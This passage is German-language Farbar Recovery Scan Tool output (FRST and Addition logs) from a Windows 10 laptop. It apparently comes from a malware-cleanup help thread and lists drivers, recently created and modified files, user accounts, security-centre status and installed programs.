R3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [138904 2020-11-28] (Malwarebytes Inc -> Malwarebytes)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [46472 2019-03-19] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [333784 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [62432 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
S3 wsvd; C:\WINDOWS\system32\DRIVERS\wsvd.sys [102376 2012-06-13] (CyberLink -> "CyberLink)
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2020-11-28 18:00 - 2020-11-28 18:00 - 000000922 _____ C:\Users\seife\Desktop\scan_201128-175836.txt
2020-11-28 17:57 - 2020-11-28 17:57 - 000000000 ____D C:\ProgramData\Emsisoft
2020-11-28 17:56 - 2020-11-28 18:00 - 000000000 ____D C:\EEK
2020-11-28 17:53 - 2020-11-28 17:56 - 321944400 _____ C:\Users\seife\Desktop\EmsisoftEmergencyKit.exe
2020-11-28 16:22 - 2020-11-28 16:22 - 000002336 _____ C:\Users\seife\Desktop\as_9210.tmp.txt
2020-11-28 16:13 - 2020-11-28 16:21 - 000000000 ____D C:\ProgramData\RogueKiller
2020-11-28 16:13 - 2020-11-28 16:13 - 031031352 _____ C:\Users\seife\Downloads\RogueKiller64.exe
2020-11-28 16:13 - 2020-11-28 16:13 - 031031352 _____ C:\Users\seife\Desktop\RogueKiller64.exe
2020-11-28 16:11 - 2020-11-28 16:11 - 000197792 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2020-11-28 16:11 - 2020-11-28 16:11 - 000138904 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2020-11-28 16:11 - 2020-11-28 16:11 - 000077496 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2020-11-28 16:11 - 2020-11-28 16:11 - 000004249 _____ C:\Users\seife\Desktop\AdwCleaner[C00].txt
2020-11-28 16:08 - 2020-11-28 16:10 - 000000000 ____D C:\AdwCleaner
2020-11-28 16:08 - 2020-11-28 16:08 - 008447152 _____ (Malwarebytes) C:\Users\seife\Desktop\adwcleaner_8.0.8.exe
2020-11-28 14:58 - 2020-11-28 17:42 - 000024315 _____ C:\Users\seife\Desktop\Addition.txt
2020-11-28 14:56 - 2020-11-28 18:01 - 000020204 _____ C:\Users\seife\Desktop\FRST.txt
2020-11-28 14:40 - 2020-11-28 14:56 - 000008638 _____ C:\Users\seife\Desktop\Search.txt
2020-11-28 14:37 - 2020-11-28 16:06 - 000001147 _____ C:\Users\seife\Desktop\Fixlog.txt
2020-11-28 14:34 - 2020-11-28 14:34 - 000000187 _____ C:\Users\seife\Desktop\app.txt
2020-11-28 13:16 - 2020-11-28 18:01 - 000000000 ____D C:\FRST
2020-11-28 13:15 - 2020-11-28 13:15 - 002290176 _____ (Farbar) C:\Users\seife\Desktop\FRST64.exe
2020-11-28 13:04 - 2020-11-28 13:04 - 000000080 ___SH C:\bootTel.dat
2020-11-28 12:35 - 2020-11-28 12:47 - 000000000 ____D C:\Users\seife\Doctor Web
2020-11-28 12:35 - 2020-11-28 12:35 - 000000000 ____D C:\ProgramData\Doctor Web
2020-11-28 12:32 - 2020-11-28 12:34 - 234730072 _____ C:\Users\seife\Downloads\6dqs0oee.exe
2020-11-26 17:29 - 2020-11-26 17:29 - 000248968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2020-11-26 17:29 - 2020-11-26 17:29 - 000220160 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2020-11-26 17:29 - 2020-11-26 17:29 - 000153312 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2020-11-26 17:29 - 2020-11-26 17:29 - 000019912 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2020-11-26 17:29 - 2020-11-26 17:29 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2020-11-26 17:29 - 2020-11-26 17:29 - 000002028 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2020-11-26 17:29 - 2020-11-26 17:29 - 000002028 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2020-11-26 17:29 - 2020-11-26 17:29 - 000000000 ____D C:\Users\seife\AppData\Local\mbam
2020-11-26 17:29 - 2020-11-26 17:29 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-11-26 17:28 - 2020-11-26 17:28 - 000000000 ____D C:\Program Files\Malwarebytes
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth9.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth8.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth7.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth6.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth5.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth4.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth3.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth2.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth12.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth11.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth10.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth1.bin
2020-11-22 11:17 - 2020-11-22 11:17 - 001841152 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2020-11-22 11:17 - 2020-11-22 11:17 - 001101312 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2020-11-22 11:16 - 2020-11-22 11:16 - 000200704 _____ C:\WINDOWS\system32\IHDS.dll
2020-11-22 11:16 - 2020-11-22 11:16 - 000164864 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2020-11-18 10:57 - 2020-10-06 01:13 - 000835472 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-11-18 10:57 - 2020-10-06 01:13 - 000179608 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2020-11-14 17:28 - 2020-11-27 17:29 - 000055296 _____ C:\Users\seife\AppData\Roaming\cookies.sqlite
2020-11-14 16:50 - 2020-11-14 17:39 - 000000000 ____D C:\Users\seife\AppData\Roaming\.minecraft
==================== Ein Monat (geänderte) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2020-11-28 17:56 - 2019-03-19 05:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-11-28 17:27 - 2019-10-27 13:41 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-11-28 16:38 - 2017-03-11 12:31 - 000000000 ____D C:\Users\seife\AppData\Local\fotokasten comfort
2020-11-28 16:16 - 2019-10-27 13:52 - 001723292 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-11-28 16:16 - 2019-03-19 13:16 - 000745142 _____ C:\WINDOWS\system32\perfh007.dat
2020-11-28 16:16 - 2019-03-19 13:16 - 000150430 _____ C:\WINDOWS\system32\perfc007.dat
2020-11-28 16:16 - 2019-03-19 05:50 - 000000000 ____D C:\WINDOWS\INF
2020-11-28 16:13 - 2019-02-03 08:57 - 000000000 ____D C:\ProgramData\Mozilla
2020-11-28 16:12 - 2017-02-25 16:39 - 000000000 ____D C:\Users\seife\AppData\LocalLow\Mozilla
2020-11-28 16:12 - 2017-02-25 15:17 - 000000000 ___RD C:\Users\seife\OneDrive
2020-11-28 16:11 - 2019-10-27 13:53 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-11-28 16:11 - 2017-02-25 15:15 - 000000000 __SHD C:\Users\seife\IntelGraphicsProfiles
2020-11-28 16:11 - 2017-01-25 11:30 - 000000000 ____D C:\ProgramData\NVIDIA
2020-11-28 16:10 - 2019-03-19 05:37 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2020-11-28 16:10 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2020-11-28 16:10 - 2017-09-13 14:23 - 000000000 ____D C:\Users\seife\AppData\Local\Downloaded Installations
2020-11-28 15:57 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-11-28 15:57 - 2018-03-02 18:40 - 000000000 ____D C:\Users\seife\AppData\Local\Packages
2020-11-28 14:37 - 2017-04-06 21:18 - 000000000 ____D C:\Users\seife\AppData\LocalLow\Temp
2020-11-28 14:29 - 2019-10-27 13:53 - 000000000 ____D C:\WINDOWS\system32\Tasks\CyberLink
2020-11-28 14:29 - 2017-02-25 15:30 - 000000000 ____D C:\Users\seife\AppData\Local\CyberLink
2020-11-28 14:29 - 2017-01-25 11:20 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo
2020-11-28 14:29 - 2017-01-25 11:20 - 000000000 ____D C:\ProgramData\CyberLink
2020-11-28 14:29 - 2017-01-25 11:19 - 000000000 ____D C:\ProgramData\Temp
2020-11-28 14:29 - 2017-01-25 11:19 - 000000000 ____D C:\ProgramData\SUPPORTDIR
2020-11-28 14:29 - 2017-01-25 11:18 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2020-11-28 14:29 - 2017-01-25 11:18 - 000000000 ____D C:\Program Files (x86)\Lenovo
2020-11-28 13:00 - 2019-10-27 13:46 - 000000000 ____D C:\Users\seife
2020-11-28 12:57 - 2019-10-27 13:41 - 000595096 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-11-28 12:48 - 2017-02-26 13:06 - 000000000 ____D C:\Program Files (x86)\Google
2020-11-28 12:29 - 2017-01-25 11:20 - 000000000 ____D C:\ProgramData\Package Cache
2020-11-27 17:24 - 2017-03-19 13:58 - 000000000 ____D C:\Users\seife\AppData\Local\CrashDumps
2020-11-26 20:06 - 2019-10-27 13:53 - 000004210 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
2020-11-26 20:03 - 2020-10-17 10:12 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2020-11-26 20:02 - 2017-02-25 16:38 - 000001239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-11-26 20:02 - 2017-02-25 16:38 - 000001227 _____ C:\Users\Public\Desktop\Firefox.lnk
2020-11-26 20:02 - 2017-02-25 16:38 - 000001227 _____ C:\ProgramData\Desktop\Firefox.lnk
2020-11-26 18:44 - 2019-03-19 05:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-11-26 18:18 - 2020-09-24 08:24 - 000002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-11-26 18:18 - 2020-09-24 08:24 - 000002281 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-11-26 18:18 - 2020-09-24 08:24 - 000002281 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2020-11-26 17:30 - 2019-10-27 13:53 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-11-26 17:30 - 2017-02-26 13:06 - 000002143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-11-26 17:29 - 2019-03-19 05:52 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-11-26 17:22 - 2018-12-16 01:08 - 000000000 ____D C:\Users\seife\AppData\Local\D3DSCache
2020-11-26 17:15 - 2017-04-06 20:47 - 000000000 ___RD C:\Users\seife\3D Objects
2020-11-26 17:15 - 2016-07-29 18:27 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\TextInput
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\SystemResources
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\setup
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\oobe
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-11-22 11:32 - 2017-08-04 23:14 - 000000000 ____D C:\Users\seife\AppData\Local\ElevatedDiagnostics
2020-11-22 11:22 - 2020-10-17 10:36 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-11-22 11:22 - 2019-03-19 05:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-11-22 11:16 - 2019-10-27 13:44 - 002876928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ___RD C:\WINDOWS\PrintDialog
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\es-MX
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\appraiser
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\Provisioning
2020-11-18 09:16 - 2017-02-26 14:44 - 133736600 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2020-11-18 09:16 - 2017-02-26 14:44 - 000000000 ____D C:\WINDOWS\system32\MRT
2020-11-14 18:17 - 2017-02-25 16:38 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-11-14 16:43 - 2019-10-27 13:53 - 000003356 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2235809649-4173297830-2174137979-1001
2020-11-14 16:43 - 2019-10-27 13:46 - 000002390 _____ C:\Users\seife\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-11-14 16:42 - 2020-09-24 08:23 - 000003700 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-11-14 16:42 - 2020-09-24 08:23 - 000003576 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-11-12 11:00 - 2020-10-17 10:36 - 000907064 _____ (Microsoft Corporation) C:\WINDOWS\system32\sedplugins.dll
2020-11-12 10:59 - 2020-10-17 10:36 - 000436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\QualityUpdateAssistant.dll
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========
2020-11-14 17:28 - 2020-11-27 17:29 - 000055296 _____ () C:\Users\seife\AppData\Roaming\cookies.sqlite
==================== SigCheck ============================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
==================== Ende von FRST.txt ========================
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 28-11-2020
durchgeführt von seife (28-11-2020 18:01:58)
Gestartet von C:\Users\seife\Desktop
Windows 10 Home Version 1909 18363.1198 (X64) (2019-10-27 12:53:40)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-2235809649-4173297830-2174137979-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2235809649-4173297830-2174137979-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-2235809649-4173297830-2174137979-1000 - Limited - Disabled) => C:\Users\defaultuser0
Gast (S-1-5-21-2235809649-4173297830-2174137979-501 - Limited - Disabled)
seife (S-1-5-21-2235809649-4173297830-2174137979-1001 - Administrator - Enabled) => C:\Users\seife
WDAGUtilityAccount (S-1-5-21-2235809649-4173297830-2174137979-504 - Limited - Disabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20066 - Adobe Systems Incorporated)
Adobe Flash Player 29 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 29.0.0.113 - Adobe Systems Incorporated)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 382.64 - NVIDIA Corporation) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.72 - Piriform)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Dolby Audio X2 Windows API SDK (HKLM\...\{82C288CC-A96D-43E3-9119-944DABF5DD61}) (Version: 0.8.0.74 - Dolby Laboratories, Inc.)
Dolby Audio X2 Windows APP (HKLM\...\{9207D68E-666A-49C7-A900-9F5B2FF289E4}) (Version: 0.8.0.71 - Dolby Laboratories, Inc.)
Fotogalerie (HKLM-x32\...\{41BF4A3B-D60A-4E92-883F-C88C8C157261}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
HiSuite (HKLM-x32\...\Hi Suite) (Version: 9.1.0.309 - )
honestech VHS to DVD 2.0 SE (HKLM-x32\...\{2856F5EA-E98A-40E4-BAD6-8C644A4A3F3C}) (Version: 2.0 - honestech)
Intel(R) Wireless Bluetooth(R) (HKLM-x32\...\{278F5FF6-100E-4089-924F-80BDB7F81B4E}) (Version: 19.10.1635.0483 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{bb0592a7-5772-4736-9d55-2402740085db}) (Version: 10.1.1.38 - Intel(R) Corporation) Hidden
Intel® PROSet/Wireless Software (HKLM-x32\...\{66614300-cd9b-4a62-8b18-c97e9562dc3e}) (Version: 19.50.0 - Intel Corporation)
Lenovo OneKey Recovery (HKLM\...\{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.1.0.4706 - CyberLink Corp.) Hidden
Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.1.0.4706 - CyberLink Corp.)
Lenovo Vantage Service (HKLM-x32\...\VantageSRV_is1) (Version: 3.3.115.0 - Lenovo Group Ltd.)
Malwarebytes version 4.2.3.96 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.2.3.96 - Malwarebytes)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.47 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.137.99 - )
Microsoft OneDrive (HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\OneDriveSetup.exe) (Version: 20.169.0823.0008 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{0BCA8FBE-0C1C-4C65-98A3-5D34AAF41737}) (Version: 2.70.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{70C91B91-61E8-4D06-86D6-A9DCC291983A}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 83.0 (x64 de) (HKLM\...\Mozilla Firefox 83.0 (x64 de)) (Version: 83.0 - Mozilla)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
NVIDIA 3D Vision Treiber 382.64 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 382.64 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA Grafiktreiber 382.64 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 382.64 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden
UpdateAssistant (HKLM\...\{F49D6A65-1AB6-4728-9FDA-DB5BAB631CF6}) (Version: 1.23.0.0 - Microsoft Corporation) Hidden
USB2.0 Grabber (HKLM-x32\...\{45518B6D-9DDF-4144-83E4-A56762524F35}) (Version: 7.12.000.003 - Youyan)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Vulkan Run Time Libraries 1.0.33.0 (HKLM\...\VulkanRT1.0.33.0) (Version: 1.0.33.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.0 (HKLM\...\VulkanRT1.0.42.0) (Version: 1.0.42.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0-2) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1-2) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
WhatsApp (HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\WhatsApp) (Version: 0.2.5863 - WhatsApp)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version: - )
Packages:
=========
Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2018-09-25] (Microsoft Corporation)
Lenovo Kontoportal -> C:\Program Files\WindowsApps\LenovoCorporation.LenovoID_2.0.37.0_x86__4642shxvsv8s2 [2017-04-24] (LENOVO INCORPORATED.)
Lenovo Settings -> C:\Program Files\WindowsApps\LenovoCorporation.LenovoSettings_3.177.0.0_x86__4642shxvsv8s2 [2017-12-30] (LENOVO INCORPORATED.)
Lenovo Vantage -> C:\Program Files\WindowsApps\E046963F.LenovoCompanion_10.2009.18.0_x64__k1h2ywk1493x8 [2020-10-17] (LENOVO INC.)
Mahjong Epic -> C:\Program Files\WindowsApps\KristanixStudiosAS.MahjongEpic_1.1.5.0_x64__nafbvgh473e28 [2018-10-19] (Kristanix Studios AS)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-28] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-28] (Microsoft Corporation) [MS Ad]
Microsoft Minesweeper -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMinesweeper_3.1.9160.0_x86__8wekyb3d8bbwe [2020-11-26] (Microsoft Studios) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.10142.0_x64__8wekyb3d8bbwe [2020-11-26] (Microsoft Studios) [MS Ad]
MPEG-2-Videoerweiterung -> C:\Program Files\WindowsApps\Microsoft.MPEG2VideoExtension_1.0.22661.0_x64__8wekyb3d8bbwe [2019-09-26] (Microsoft Corporation)
Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_6.97.752.0_x64__mcm4njqhnhss8 [2020-09-17] (Netflix, Inc.)
SHARE.it -> C:\Program Files\WindowsApps\30608Paradox.SHAREit81_1.7.18.0_x64__ghshvk1r7eapp [2018-02-28] (SHAREit Technologies Co.Ltd) [MS Ad]
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
